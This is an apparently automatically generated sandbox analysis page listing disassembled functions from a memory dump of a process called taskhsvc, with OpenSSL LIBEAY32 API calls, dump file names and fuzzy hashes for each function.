                                                            • Opcode Fuzzy Hash: 7e4c3cc7282ab07e67d12ccfd0f02bd01d2b95d8e59e652ecf8cbc70a4cf5cfa
                                                            • Instruction Fuzzy Hash: 83F11575A097058BDB08DF25C08065BBBF0BF48718F15C66DE8A8DBB46E770E941CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CECEE00 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 212networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$ErrorLastO_sock_should_retryaccept
                                                            • String ID: d$o
                                                            • API String ID: 948164845-2625251201
                                                            • Opcode ID: 7f6c4f1a2ca492f3b28b3f2a6be7f2e8367074e9e39cd93157f167f45ba12c6e
                                                            • Instruction ID: 2b8cf31ff0e2d3725383fa2373644db13c5ae23bd238df8c22d6a0c2c64235dc
                                                            • Opcode Fuzzy Hash: 7f6c4f1a2ca492f3b28b3f2a6be7f2e8367074e9e39cd93157f167f45ba12c6e
                                                            • Instruction Fuzzy Hash: 068147B16087419FDB10DF69C68430ABBF0BF85318F218A1DE5B88B790D379E5498B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE8AC50 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EC_GF2m_simple_method.LIBEAY32 ref: 6CE8AC72
                                                            • EC_GROUP_new.LIBEAY32 ref: 6CE8AC7A
                                                              • Part of subcall function 6CE83540: CRYPTO_malloc.LIBEAY32 ref: 6CE8357E
                                                              • Part of subcall function 6CE83540: BN_init.LIBEAY32 ref: 6CE835AD
                                                              • Part of subcall function 6CE83540: BN_init.LIBEAY32 ref: 6CE835B8
                                                            • EC_GROUP_set_curve_GF2m.LIBEAY32 ref: 6CE8AC9A
                                                            • EC_GROUP_clear_free.LIBEAY32 ref: 6CE8ACD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_init$F2m_simple_methodO_mallocP_clear_freeP_newP_set_curve_
                                                            • String ID: A$|
                                                            • API String ID: 2360485117-641917524
                                                            • Opcode ID: 3bac6e9a5c5e036c486bc501e177f22acef528309d5c191562ae790909298e47
                                                            • Instruction ID: ac20a79042ec8e7827ca96111f99200311d6c58c3ab1f6b63bfef6fddb308185
                                                            • Opcode Fuzzy Hash: 3bac6e9a5c5e036c486bc501e177f22acef528309d5c191562ae790909298e47
                                                            • Instruction Fuzzy Hash: F9A169B158A3018FD700DF29C44024BBBF1BF85348F658D2DE99887B90E779E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF6CB0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: {
                                                            • API String ID: 1767461275-366298937
                                                            • Opcode ID: a9f8d35ead24d4391ee51c99afc12aa4197e01bca320c137626611225592003f
                                                            • Instruction ID: 92300959274f493e55419c46e32e7206c1f43f940d948b4c3032320c30a24c00
                                                            • Opcode Fuzzy Hash: a9f8d35ead24d4391ee51c99afc12aa4197e01bca320c137626611225592003f
                                                            • Instruction Fuzzy Hash: 749119755187009FDB00DF69C68060BBBF1BB8A318F128A1CE6B89B750D771E906CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF4C80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ENGINE_get_pkey_meth.LIBEAY32 ref: 6CEF4CDD
                                                            • ERR_put_error.LIBEAY32 ref: 6CEF4ED7
                                                            • ENGINE_init.LIBEAY32 ref: 6CEF4CC9
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CEF4D03
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CEF4D55
                                                            • ENGINE_get_pkey_meth_engine.LIBEAY32 ref: 6CEF4DA7
                                                            • sk_find.LIBEAY32 ref: 6CEF4DD2
                                                            • OBJ_bsearch_.LIBEAY32 ref: 6CEF4E06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_get_pkey_methE_get_pkey_meth_engineE_initJ_bsearch_O_add_lockO_mallocR_put_errorsk_find
                                                            • String ID: &
                                                            • API String ID: 3606908186-1010288
                                                            • Opcode ID: 9765d706fb986dbfa40b6276fc34f6735f914ca8336ec925bac9dc01cf024477
                                                            • Instruction ID: cddaf7764979d5b04de92287181b3408344b66a767783bae872468e364b19fa4
                                                            • Opcode Fuzzy Hash: 9765d706fb986dbfa40b6276fc34f6735f914ca8336ec925bac9dc01cf024477
                                                            • Instruction Fuzzy Hash: 66611AB16197029FE7009F25C68475BBBF4BF81348F61882DD8A88BB40E779D506CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6ADC0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF6ADFE
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • PKCS7_set_type.LIBEAY32 ref: 6CF6AE18
                                                              • Part of subcall function 6CF64420: OBJ_nid2obj.LIBEAY32 ref: 6CF6443B
                                                            • OBJ_nid2sn.LIBEAY32 ref: 6CF6AE28
                                                            • EVP_get_cipherbyname.LIBEAY32 ref: 6CF6AE30
                                                              • Part of subcall function 6CEE97A0: OBJ_NAME_get.LIBEAY32 ref: 6CEE97BD
                                                            • PKCS5_pbe2_set.LIBEAY32 ref: 6CF6AE50
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_type.LIBEAY32 ref: 6CF27CAB
                                                              • Part of subcall function 6CF27C60: ASN1_item_new.LIBEAY32 ref: 6CF27CC3
                                                              • Part of subcall function 6CF27C60: OBJ_nid2obj.LIBEAY32 ref: 6CF27CDC
                                                              • Part of subcall function 6CF27C60: ASN1_TYPE_new.LIBEAY32 ref: 6CF27CE3
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_iv_length.LIBEAY32 ref: 6CF27CF6
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_iv_length.LIBEAY32 ref: 6CF27D06
                                                              • Part of subcall function 6CF27C60: RAND_bytes.LIBEAY32 ref: 6CF27D1D
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF27D31
                                                              • Part of subcall function 6CF27C60: EVP_CipherInit_ex.LIBEAY32 ref: 6CF27D5D
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_param_to_asn1.LIBEAY32 ref: 6CF27D74
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_CTX_cleanup.LIBEAY32 ref: 6CF27D8F
                                                              • Part of subcall function 6CF27C60: X509_ALGOR_free.LIBEAY32 ref: 6CF27DA9
                                                              • Part of subcall function 6CF27C60: PKCS5_pbkdf2_set.LIBEAY32 ref: 6CF27DD1
                                                              • Part of subcall function 6CF27C60: X509_ALGOR_new.LIBEAY32 ref: 6CF27DE0
                                                              • Part of subcall function 6CF27C60: ASN1_TYPE_new.LIBEAY32 ref: 6CF27DEF
                                                              • Part of subcall function 6CF27C60: OBJ_nid2obj.LIBEAY32 ref: 6CF27E06
                                                            • X509_ALGOR_free.LIBEAY32 ref: 6CF6AE6B
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF6AE7F
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AE8A
                                                            • PKCS12_item_i2d_encrypt.LIBEAY32 ref: 6CF6AEB6
                                                            • PKCS5_pbe_set.LIBEAY32 ref: 6CF6AEEB
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AF27
                                                            • PKCS7_free.LIBEAY32 ref: 6CF6AF2F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AF67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objX509_$E_newN1_item_newR_freeR_iv_lengthR_put_error$CipherD_bytesE_getG_freeInit_exJ_nid2snP_get_cipherbynameR_newR_param_to_asn1R_typeS12_S12_item_i2d_encryptS5_pbe2_setS5_pbe_setS5_pbkdf2_setS7_freeS7_newS7_set_typeS_itX_cleanupX_init
                                                            • String ID: g$s
                                                            • API String ID: 2116476282-2319304087
                                                            • Opcode ID: f69c3745b70318d09c7753503a70dc62f5096e034d3a3a1286a48f2a517f69d7
                                                            • Instruction ID: a54a286c5ce9692af7a4fa759f5104064c7eb6d4854ab692883f69d300f7aec5
                                                            • Opcode Fuzzy Hash: f69c3745b70318d09c7753503a70dc62f5096e034d3a3a1286a48f2a517f69d7
                                                            • Instruction Fuzzy Hash: 1E51C1B19097019FD300DF26C18464BBBF0BF89758F12891DE8989BB50D779E949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF8C60 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8CED
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8EBC
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8ED3
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8EFE
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8FBC
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8FF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_put_error
                                                            • String ID: A${
                                                            • API String ID: 1631441854-3089528823
                                                            • Opcode ID: 7ab55e2ac140f295698c7b0af565a1576566371a1683b59ff46ab5e939b39bb5
                                                            • Instruction ID: c47049aa06b4df4ffa5b541be652eeea97dcd7b14127794ac5228a70de6916a2
                                                            • Opcode Fuzzy Hash: 7ab55e2ac140f295698c7b0af565a1576566371a1683b59ff46ab5e939b39bb5
                                                            • Instruction Fuzzy Hash: AEC138B16093058FE714CF26C58471BBBF0BF86318F258A5EE4A88B750D375D94ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED8DF0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 250stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
